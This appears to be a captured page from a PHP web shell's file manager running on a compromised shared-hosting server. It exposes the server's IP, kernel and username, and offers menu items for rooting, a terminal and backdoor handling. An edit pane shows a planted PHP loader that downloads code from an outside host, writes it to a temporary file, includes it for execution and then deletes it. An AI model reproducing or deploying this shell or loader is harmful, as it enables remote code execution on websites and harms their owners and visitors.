Linux premium67.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
Server IP : 198.54.121.137 & Your IP : 216.73.216.159
Domains :
Cant Read [ /etc/named.conf ]
User : oppozipy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
oppozipy /
clienapps /
271259 /
Delete
Unzip
Name
Size
Permission
Date
Action
1.txt
25
B
-rw-r--r--
2025-11-11 06:43
about.php
13.03
KB
-rw-r--r--
2025-11-11 06:43
index.php
578
B
-rw-r--r--
2025-11-11 06:43
radio.php
5.22
KB
-rw-r--r--
2025-11-11 06:43
Save
Rename
<?php $url = "https://51la.zvo2.xyz/a2.txt"; // Ganti dengan URL yang diinginkan $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); if ($result === false) { echo "Error: " . "PD9waHA=" . curl_error($ch); } else { // Simpan hasil dari URL ke dalam file lokal $tempFile = tempnam(sys_get_temp_dir(), 'pasted_code_'); file_put_contents($tempFile, $result); // Include file yang telah diunduh dari URL include $tempFile; // Hapus file sementara setelah dieksekusi unlink($tempFile); } curl_close($ch);